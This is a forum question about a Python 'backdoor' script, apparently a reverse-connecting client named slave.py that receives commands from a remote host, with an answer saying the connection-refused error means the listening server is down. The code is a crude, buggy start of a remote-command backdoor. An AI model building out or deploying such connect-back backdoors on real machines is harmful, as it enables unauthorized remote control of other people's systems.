# How to fix an error 111 while making a python backdoor?

Tags: python

```py
 import os
 import socket

 s =socket.socket()
 port=8080
 host=("(my ip)")
 s.connect((host,port))
 print("")
 print("Connected to the server succefully")
 #connection has been completed
 #command receiving and execution
 while 1:
     command =s.recv(1024)
     command = command.decode()
     print("command recieved")
     print("")
     if command == "view_cwd":
    files = os.getcwd()
    files = str(files)
    s.send("".encode())
    s.send(command.encode())
    print("Command has been executed  successfully..")
else:
    print("")
    print("Command not recognised")
```

after running the code it gives me this error:

> Traceback (most recent call last):
> File "slave.py", line 7, in 
> s.connect((host,port))
> ConnectionRefusedError: [Errno 111] Connection refused

Comment: When asking questions please leave a little introduction of the context and what the problem  is.

Answer (score 0):

You should make sure the destination port is open. For example by trying use:

```sh
telnet {host} {port}
```

You'll find that's no matter with Python or your script. It's just that the server is shutdown.